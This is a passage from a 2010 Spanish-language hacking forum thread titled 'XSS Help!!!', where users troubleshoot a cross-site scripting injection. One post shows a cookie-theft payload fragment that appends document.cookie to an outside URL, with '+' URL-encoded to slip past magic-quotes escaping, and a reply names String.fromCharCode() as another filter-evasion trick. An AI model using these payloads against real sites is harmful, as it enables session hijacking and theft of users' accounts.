elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS Help!!!		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: XSS Help!!!  (Leído 8,275 veces)
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: XSS Help!!!
« Respuesta #20 en: 10 Febrero 2010, 23:59 pm »
Ok, no pasa nada, pero yo creo que se porque no podias hacerlo, ps pueda ser que el servidor tuviera On las magic quotes gpc que te escapaba las comillas dobles y simples por barras invertidas, siempre trata de ver el codigo de fuente y mira que pasa con lo que vas inyectando.
En línea
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #21 en: 11 Febrero 2010, 00:26 am »
yo lo prove concatenando el la url + el cookie
de este manera

"miurl.com"+document.cookie;
y despues probe

"miurl.com"%2bdocument.cookie; y asi si funciona!
es por el magic quote. gracias no mantenemos en conctato!
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: XSS Help!!!
« Respuesta #22 en: 11 Febrero 2010, 00:31 am »
Bueno tambien, eso se llama url encoding, pero si alguna vez en cuentra otro XSS y no te funciona encodear la url por, ps te toca usar String.fromCharCode()
En línea
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines